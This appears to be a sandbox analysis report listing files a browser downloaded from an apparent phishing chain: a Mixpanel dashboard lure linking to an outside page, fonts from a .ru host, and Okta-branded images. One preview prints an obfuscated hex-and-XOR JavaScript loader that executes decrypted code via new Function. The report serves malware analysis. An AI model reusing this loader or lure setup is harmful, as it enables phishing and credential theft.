                                                                            Preview:try{let e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},n=(new e.Error).stack.n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="556f68ae-c672-4a2b-a38c-d845849ea9c9",e._sentryDebugIdIdentifier="sentry-dbid-556f68ae-c672-4a2b-a38c-d845849ea9c9")}catch(e){}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e._sentryModuleMetadata=e._sentryModuleMetadata||{}.e._sentryModuleMetadata[(new e.Error).stack]=Object.assign({},e._sentryModuleMetadata[(new e.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let e=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.e.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (373)
                                                                            Category:downloaded
                                                                            Size (bytes):1347
                                                                            Entropy (8bit):5.44882563920745
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:7ABEEB643CABB76645A68BF629161208
                                                                            SHA1:039E3E1301587CE921EA8C14996573AF43B090F9
                                                                            SHA-256:000FE91B1BFC9EDB2F430B76B3866768E297A3E1A03C30E0B1E6AF11B1A46A14
                                                                            SHA-512:4407C7666C23C3C4A2EF2EBEFCDD612960A0356A2B55738C639401D3AB0D84DC886CD9D474DC4F32112DDF334B9DEB3AD3172D01C983F2882E10B2BB64DBED34
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://prudn87837498798487434.us-lax-1.linodeobjects.com/900pppejdedr.html
                                                                            Preview:<html>.<head>.<meta charset="UTF-8">.</head>.<body>.<script>.iztRl = "";.. /* She tended to her flower garden with care. */.const bvzsA = StyYj =>. StyYj.match(/.{1,2}/g). .map(XhJkY => String.fromCharCode(parseInt(XhJkY, 16))). .join('');.. /* The family went on a camping trip in the woods. */.const DNHCT = (skYou, tnmKy) =>. skYou.split(''). .map((YDxHi, cfZOt) =>. String.fromCharCode(YDxHi.charCodeAt(0) ^ tnmKy.charCodeAt(cfZOt % tnmKy.length)). ). .join('');.. /* The wind rustled the leaves on the trees. */.const NMbuN = vRXqY => new Function(vRXqY)();.. /* The chef created a masterpiece with fresh ingredients. */.const vajwG = (tnmKy, HFgOs) => {. const nwacr = bvzsA(HFgOs);. const pdfBa = DNHCT(nwacr, tnmKy);. NMbuN(pdfBa);.};.. /* They watched a movie under the stars. */.const mhLFW = "401a1fbd05a484654aa8f310";.const dgJft = "57495f0e421310011008416f353e115d40464d1a1243131c16430b431d414d4b1719466e61131a17422a4314411d571718505600514a020d45554d5
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):16
                                                                            Entropy (8bit):3.5
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                            SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                            SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                            SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIZCf7bwzPu_zfpEgUNNzCpMCHiqueaPL01Vg==?alt=proto
                                                                            Preview:CgkKBw03MKkwGgA=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:JSON data
                                                                            Category:downloaded
                                                                            Size (bytes):1033
                                                                            Entropy (8bit):5.242361256995748
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E1413E5DF92A4A7B6AA1175B5726FBBA
                                                                            SHA1:ABBDAF7132C6F676CCF65A014C2BC80C9EC1E31C
                                                                            SHA-256:9961224E9F702F4187AA0681FEB32F4BFB526915293ECBAAD7E84857654F0229
                                                                            SHA-512:7C62D88D400156C2B1706556CD361D72DF874C2A205101CD0442123BA233FFFE154C275FBA59113D548D5873B42B8143C67BD022F37084C5E7EC68B586F7F399
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/api/app/public/dashboards/75842ed5-2e21-48a8-81e7-e762e80766ad/
                                                                            Preview:{"status": "ok", "results": {"id": 9526001, "title": "Approved Proposal From Colorado Succeeds, Inc", "description": "", "is_private": false, "is_restricted": false, "filters": [], "breakdowns": null, "time_filter": {}, "created": "2025-03-26T00:40:38", "modified": "2025-03-26T00:43:16", "is_favorited": false, "pinned_date": null, "generation_type": "User Created", "layout_version": "2.0.0", "template_type": null, "parent_dashboard_id": null, "layout": {"rows": {"hEKwdv3x": {"cells": [{"id": "NKsNrnxE", "width": 12, "content_id": 8943232, "content_type": "text"}], "height": 0}}, "order": ["hEKwdv3x"], "version": "2.0.0"}, "contents": {"dashboard": {}, "report-link": {}, "report": {}, "text": {"8943232": {"id": 8943232, "dashboard_id": 9526001, "markdown": "<p>BELOW DOCUMENT IS FOR YOUR REVIEW AND FEEDBACK</p><p>PAGES: 3</p><p><a target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://automotorespascualito.com/hpp/index.php\">OPEN DOCUMENT</a></p>"}}, "media": {}, "benchma
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):93276
                                                                            Entropy (8bit):7.997636438159837
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                            SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                            SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                            SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-vf2.woff2
                                                                            Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 48000, version 1.0
                                                                            Category:downloaded
                                                                            Size (bytes):48000
                                                                            Entropy (8bit):7.995310855933246
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:1771A1753012D4DFED6CC701BB376261
                                                                            SHA1:1DC52EA971640FA47D29E5DB3B2F0A05E0B92C29
                                                                            SHA-256:C702C3EA51A20752C1A97A665F01D037AD0FD4BBB0F49170DA6986C61771701B
                                                                            SHA-512:AB4EC27F21FD30915AA7DE11E60EB3E3F4E4FAAACBB2B6FBA1B6BC1A92C98E76D0DE75D0B5043930F188A4FCD3F3E8DAA7CBD40C1EAB1AD94024C662A6FE4082
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/marketing/fonts/apercu/web/5.008/apercu-regular-pro.woff2
                                                                            Preview:wOF2..................................................D....`..D..(........4..\..V..6.$..(. ..y..N..V[o.q.3..K..........H...-.I...R....n....C....[e......-.g\oKo.~.8......t.w0.$:'...1.u..'Q#..(...1b.C.u"v;i..&b..226t..C.:.V.gJ....9:N..0.Q..X.....q+]A......,..B.)...6.<..(..z.=:[."2.>..*..M.-.i.Yn.z.........2._.....aV..c..Y.S..U...pTw. .}.0w...6..Vj...w....g...,.T))I1...."V...cF.Q...+I.&..7.s.QN...]e.>...:ip...l...b=.{X.7..*.j.m../.l.S@...@.h1.lqD..k..P..._...{.. /."F....4.........5._{.ksg....Af.....1b0QhJ.&.-M%4.y.$?M..'.SyUjD^J.H.S1J..Y.s....{.k6F.z.5.....*.#..I.0.J..9.p8.........#..*.w............%.A..Ri5X..P'..p.s..}.....1......X{..z..J PD...B.c.c.B."....y`a...|._e...o.S.?L.2U.h*F..O..1"v...9$vh...J.>i.[.?..x....Y.O.......O.a.7@.......y.E}E..z.1.l..\....g.=........~.PEd..>x.ntU.v?9.I..X..N..A...?..%.l.%.s...E.IZ..B..9.lj...A;._.. ..P.&.n.7..x..n.6..I.....&M*.:..x.a.&'...e.dIf\...t....\5).WM%M.DI>..u.2....c.ub..N.....Ng.`..w.~.J......l.>..-.[..tIS..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 420 x 94, 8-bit/color RGBA, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):10796
                                                                            Entropy (8bit):7.946024875001343
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:12BDACC832185D0367ECC23FD24C86CE
                                                                            SHA1:4422F316EB4D8C8D160312BB695FD1D944CBFF12
                                                                            SHA-256:877AE491D9AAC5C6EF82A8430F9F652ACE8A0DBC7294BD112AAD49BD593769D0
                                                                            SHA-512:36C319AC7F75202190E7A59F3F3C92892A71D5F17663E672319A745B6574BCFDE7C89B35F480CB15A193924DACB9D67F8CA1E1BC2BF33FC5CCBFA152CC7BA2D0
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7
                                                                            Preview:.PNG........IHDR.......^.....l2`...).IDATx..}...U.... w...B..P$.Hv..t......x.EA@.Q`.E......-.".(..X`..D....5]]U}....$3...&...guOw..}>.....~....w.ZZ...z..FZ$I.$I....N.......tt.$e...M....ru$I.$IR.h.AvK0.t..wy.:.1...D.H...LS....iF~.X...smr.$I.$IR.4.....SY..@....h8.....*..dB...1.eG...$I.$.hZ...8.r...[.A.I..XE..hdA{Z..teaF...u:}.1^..-I.$I.FP.A..Nm..........A78...=.%W_.$I..8YQ.H2z#.D_...m..k..u.t..R6#.....N....){...$I..1@...g...@a ..u2..dL...*ai.d.[.$I..D.....OM..a...,h%u.B.....0...57..hrW..$I....Gf.|.=.eg`.........k.J.$IR..<.u....]....@.d...H..$I.$5..MWwu:....H|Y..,.$.I.$I....Qu...s.NzzM..]..;$ I.$IR......+..L9......63.I@.$I..z..#.....:..7...s..<$ I.$I.hP.tu...m"..o1.y.@..W1T<(..... z%."?.4zE..$ ..Y1z`.P..!....`t%t....[..d...N.UKy&.A;..6S...<...........o...]0...r.$I......0..R.....N.....0Wi._.;...M..Lrb{.7w..].jm.r....C...&..gd}..Etm}..~L.l...}n\'...$..Mr.i..{..n..9.....SwMh.}.Q{./wJ.....B]:.....+..\V...A.S.w..6.....,..[.......J@....-.4.....:..Zvt.r.*.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):138
                                                                            Entropy (8bit):4.7807111582001305
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:91AE278F1336EC92131BED690250F158
                                                                            SHA1:B8D3E05B3B4FB0BFE71770D06E34223F1D1739CE
                                                                            SHA-256:8A9170B8648F09E09A193DF5FB55032712F417D2DC56F42F82B47F4FFEE0D7B7
                                                                            SHA-512:3BE310FA8DC23E814803554FDC0507AA38206290F500F2DF609B91BD57C9C31132DFA44D384611366655876CFFAC0B588D3E11D7C5FEE847A0BB9D49FA666BA5
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWf&oit=3&cp=18&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWf",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):210051
                                                                            Entropy (8bit):5.380011964653255
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:0C4698FC4C2161D9740606B05DCC11CE
                                                                            SHA1:7CFC7BDFA1B5F86111A0CA9A0F3B4CE1F81420C6
                                                                            SHA-256:FFE46E79D583AD737B2CFDC9AA6361FAD57662318101787A0E26371708665525
                                                                            SHA-512:C2E0C58AFAA7497FDF23EF7D20E872FE70089A6283C906F265FBFCB5449584B488A46B0335A9EC5ACAAD4FA86A6EA79109CA70CC70BCB2E22A1E122446ED0967
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/0d0c3e9cf67344f0ac79/iron_common_contexts_storage-manager_util_ts-iron_common_report_contexts_report-info_index_ts-aa683e.min.css
                                                                            Preview:.container__YB_n38D8 li{list-style-type:disc}.container__YB_n38D8 ul{padding-left:16px}.dataset-holder{align-items:center;background-color:var(--background-color);border:1px solid var(--component-outline-color);border-radius:12px;cursor:pointer;display:flex;flex-direction:column;height:12vmin;justify-content:center;margin-bottom:12px;margin-left:6px;margin-right:6px;max-height:156px;max-width:156px;min-height:156px;min-width:156px;overflow:hidden;position:relative}.dataset-holder.selected{border:1px solid var(--blue1);box-shadow:var(--drop-box-shadow)}.dataset-holder:hover{box-shadow:var(--drop-box-shadow);color:var(--blue1);cursor:pointer}.dataset-holder .image-holder{display:block;font-size:14px;font-weight:700;height:100%;max-height:93.6px;max-width:93.6px;min-height:93.6px;min-width:93.6px;text-align:center}.dataset-holder .Media{background-image:url(//cdn.mxpnl.com/static/asset-cache/abe01bad0669c139d0df/iron/common/widgets/demo-selector-modal/assets/icons/Media.svg)}.dataset-hold
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                            Category:downloaded
                                                                            Size (bytes):25216
                                                                            Entropy (8bit):7.947339442168474
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:F9A795E2270664A7A169C73B6D84A575
                                                                            SHA1:0FBB60AB27AB88C064EB347D0722C8ED4CF5E8B8
                                                                            SHA-256:D00203B2EEA6E418C31BAAFA949ADA5349A9F9B7E99FA003AEC7406822693740
                                                                            SHA-512:E17C8D922F52C8AB36D9C0A7DC41D32735CF1680EA653056308C6D23255FDBE40B96C68F0E7F8B3B521B6ACB080CD825F94320364B0A70141606A4449D980517
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/ijy2fRQQJuz4z04afoy15ExbmbUYT6xx10nJD7vmnUY6HNJ3QW1gCt7rwnOgycX0cZOI7rFef205
                                                                            Preview:RIFFxb..WEBPVP8X....0...o.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.Y....'$H..xkD....oUS..[.uM....CwI.H#.H.t(..!J.AJ# .(........0.W.?D...g.6..u......}K5.>|....^..*2.....z..../.1..F..A...Vk..W.Wm?z....H+.;:...s..Z;....V.....Z.gm.......\>.}..-.....w...D.........+,K...#......._[L.[.]w1..[.l..8.....f..E...W....;....o.Q...T`.W.(..........;^........:.T..6......Yo..x.6..n.\A.5X.........J....2.O.)....0..zdL1.x.X..e?.eA.M%f.D..W.].A=6D.....w....>.*3|M.7....aEe&l.or.Tt^.*6li..lYz.HF.....2.\...U.tfQ.<ZlHB.G--....]T..h.L.U]...m....{..T{....~......K#
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:C++ source, ASCII text, with very long lines (3327)
                                                                            Category:downloaded
                                                                            Size (bytes):59285
                                                                            Entropy (8bit):5.287307947613595
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:E26811801D0E2C4BA87E4AFC1EE85FEB
                                                                            SHA1:DB61423C7E04E7BA21991FA15414593793C07F68
                                                                            SHA-256:880E627B9FB830795A80E6E8AF32C9CB223F7AE4256765FAA7BF9F3F3C327FCA
                                                                            SHA-512:67D5D6037ABAC59AEF7B647669A79C5D59580934E13EC6FA51B0D876AC8F018D578CC655A8531CD3CA0C4FF54640C93D5DCA42F6D24DA3E94D02C995928A800F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/5040f4c826dd22412815/gdpr.min.js
                                                                            Preview:try{let t="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},e=(new t.Error).stack.e&&(t._sentryDebugIds=t._sentryDebugIds||{},t._sentryDebugIds[e]="174483ca-9fa7-49ac-ae56-79567fd223f2",t._sentryDebugIdIdentifier="sentry-dbid-174483ca-9fa7-49ac-ae56-79567fd223f2")}catch(t){}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t._sentryModuleMetadata=t._sentryModuleMetadata||{}.t._sentryModuleMetadata[(new t.Error).stack]=Object.assign({},t._sentryModuleMetadata[(new t.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let t=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.t.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                            Category:downloaded
                                                                            Size (bytes):28584
                                                                            Entropy (8bit):7.992563951996154
                                                                            Encrypted:true
                                                                            SSDEEP:
                                                                            MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                            SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                            SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                            SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://zyvk.fgaiuin.ru/GDSherpa-regular.woff2
                                                                            Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (33741)
                                                                            Category:downloaded
                                                                            Size (bytes):117850
                                                                            Entropy (8bit):5.35110689724916
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:759DF60B92C89F06629BC7608F4F70A8
                                                                            SHA1:18F22EED014A49DA0E15C7B7944965A44B8D1D26
                                                                            SHA-256:787B4992E25920B9165B830AB4331231041905E133D2CECB0C1E7A95898E07F2
                                                                            SHA-512:52B74E2E66344A4256FEEAB8ED516F7ACADE8EB0E323BFAD82D43D851ED98F0ECA52828008E480809F844BAA2CDA58EB05DC14CD3658B4B2D653331AD2B461F1
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/libs/mixpanel-recorder.dev.min.js
                                                                            Preview:(function(){"use strict";var x;if(typeof window>"u"){var Pt={hostname:""};x={crypto:{randomUUID:function(){throw Error("unsupported")}},navigator:{userAgent:"",onLine:!0},document:{createElement:function(){return{}},location:Pt,referrer:""},screen:{width:0,height:0},location:Pt,addEventListener:function(){},removeEventListener:function(){}}}else x=window;var P;(function(e){e[e.Document=0]="Document",e[e.DocumentType=1]="DocumentType",e[e.Element=2]="Element",e[e.Text=3]="Text",e[e.CDATA=4]="CDATA",e[e.Comment=5]="Comment"})(P||(P={}));function Vr(e){return e.nodeType===e.ELEMENT_NODE}function Ee(e){const t=e?.host;return t?.shadowRoot===e}function Re(e){return Object.prototype.toString.call(e)==="[object ShadowRoot]"}function Jr(e){return e.includes(" background-clip: text;")&&!e.includes(" -webkit-background-clip: text;")&&(e=e.replace(" background-clip: text;"," -webkit-background-clip: text; background-clip: text;")),e}function Xr(e){const{cssText:t}=e;if(t.split('"').length<3)retur
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1808)
                                                                            Category:downloaded
                                                                            Size (bytes):10701887
                                                                            Entropy (8bit):5.638693201509545
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:5EC8F3740C58D669B27280D3C5CC083E
                                                                            SHA1:56A7CC30AA0B808C29384A6A1C998BC9DCE3AB69
                                                                            SHA-256:C11102170650125F4043CAF2AA536C0AA1FCCBFB4A609B4DEA21066346CA0412
                                                                            SHA-512:3CF8BDDF7106AD9EA8714F3A448C474EB16F666F1F52AFA1D3E5B99A6D885B416B895A7DED5A74BFBFCEE6E78A68C9E5FD284AD335A8525333457BDFFBC1F336
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://cdn.mxpnl.com/static/asset-cache/c583b2e7abf6b4a3b6d0/common/iron.min.js
                                                                            Preview:try{let d="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof globalThis?globalThis:"undefined"!=typeof self?self:{},M=(new d.Error).stack.M&&(d._sentryDebugIds=d._sentryDebugIds||{},d._sentryDebugIds[M]="252eae99-539d-442f-aa37-f258a5e53699",d._sentryDebugIdIdentifier="sentry-dbid-252eae99-539d-442f-aa37-f258a5e53699")}catch(d){}{let d=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.d._sentryModuleMetadata=d._sentryModuleMetadata||{}.d._sentryModuleMetadata[(new d.Error).stack]=Object.assign({},d._sentryModuleMetadata[(new d.Error).stack],{"_sentryBundlerPluginAppKey:web-client":true})}{let d=typeof window!=="undefined"?window:typeof global!=="undefined"?global:typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:{}.d.SENTRY_RELEASE={id:"4e4ed9f03921e0dc1817ed5c192f5087de7ce55b"}}(self.webpackChunkanalytics=self.webpackChunkanalyti
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):149
                                                                            Entropy (8bit):4.963230049616465
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BB281479158BA70DACD6602CC2E0241C
                                                                            SHA1:2CE972FB741B3D36B3164F578FFBCF5BEA58244F
                                                                            SHA-256:53E7A8E01715D58527DB0C44FE76F4152EA55CBD62EE7B4674340726AC8E1EE7
                                                                            SHA-512:0DEA85718DF61CF795C69FA253F82FBB03012066229009B7D53ABF373F1C62313451CD4CA0D4A835DD0B65C5F5DD2699F41D9DD721DB6CD009909097DE9B614F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFWfQuhi1aNTS16&oit=3&cp=29&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FWfQuhi1aNTS16",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text
                                                                            Category:downloaded
                                                                            Size (bytes):137
                                                                            Entropy (8bit):4.767825986582648
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:BE474DF8DCC97CB3E2ED12613A55BA74
                                                                            SHA1:B7FEC39D8AF1A364916398637DE0663FF7879EA7
                                                                            SHA-256:269019E87A0549586E03449A7FB713D5FDBF511D0741843D028C37A93AAA787E
                                                                            SHA-512:01D29D922CCDFD1D5A55760BAA4723F422D33FE0AAF7319FC9DB0F82E0911B6CE9DD39DC78E513BB48662F23EDFDED673C95E06AD2422BC4D49B49D7BD485F15
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mixpanel.com%2Fp%2FFW&oit=3&cp=17&pgcl=2&gs_rn=42&psi=3eD23CteCypOE9qU&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE
                                                                            Preview:)]}'.["mixpanel.com/p/FW",[],[],[],{"google:clientdata":{"bpc":false,"tlw":true},"google:suggesttype":[],"google:verbatimrelevance":851}]
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:HTML document, ASCII text, with very long lines (964)
                                                                            Category:downloaded
                                                                            Size (bytes):5953
                                                                            Entropy (8bit):5.208882462877272
                                                                            Encrypted:false
                                                                            SSDEEP:
                                                                            MD5:579B49B80DE912EC5E7970F641EF5BF3
                                                                            SHA1:54C0D881734AC0A8FDE92157E015BD02DFF9A8FC
                                                                            SHA-256:A1DEB4D420AE7125FFBC840CB89EE452D9FD9746B641D2B2CB5900AA55006F07
                                                                            SHA-512:27B90D5E35E852143E2D2B297A2D7D8E35E003ECD888CC496A83CC02D5A68A58132F1164820C172BE92893E997D3864EBD587AC7E1CD5399332FAD02E7B51C0F
                                                                            Malicious:false
                                                                            Reputation:unknown
                                                                            URL:https://mixpanel.com/public/FWfQuhi1aNTS16WPXLxRfi
                                                                            Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta name="iframely" content="all">. <meta name="robots" content="noindex">. <meta charset="utf-8">. <title>Boards - Mixpanel | Product Analytics</title>. <link rel="icon" sizes="16x16" href="https://cdn.mxpnl.com/marketing-site/static/favicons/favicon-16x16.png" type="image/png">. <link rel="icon" sizes="32x32" href="https://cdn.mxpnl.com/marketing-site/static/favicons/favicon-32x32.png" type="image/png">. <link href="//cdn.mxpnl.com/static/asset-cache/85c7228ae40a031f663b/common/iron.min.css" type="text/css" rel="stylesheet">. <link href="//cdn.mxpnl.com/static/asset-cache/a54fa472f3ee8b06515c/reports/global-styles.min.css" type="text/css" rel="stylesheet">. <script>MIXPANEL_CUSTOM_LIB_URL = '/libs/mixpanel.dev.min.js';</script>. <script>. (function(f,b){if(!b.__SV){var e,g,i,h;window.mixpanel=b;b._i=[];b.init=function(e,f,c){function g(a,d){var b=d.split(".");2==b.length&&(a=a[b[0]],d=b[1]);a[d]=function(
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
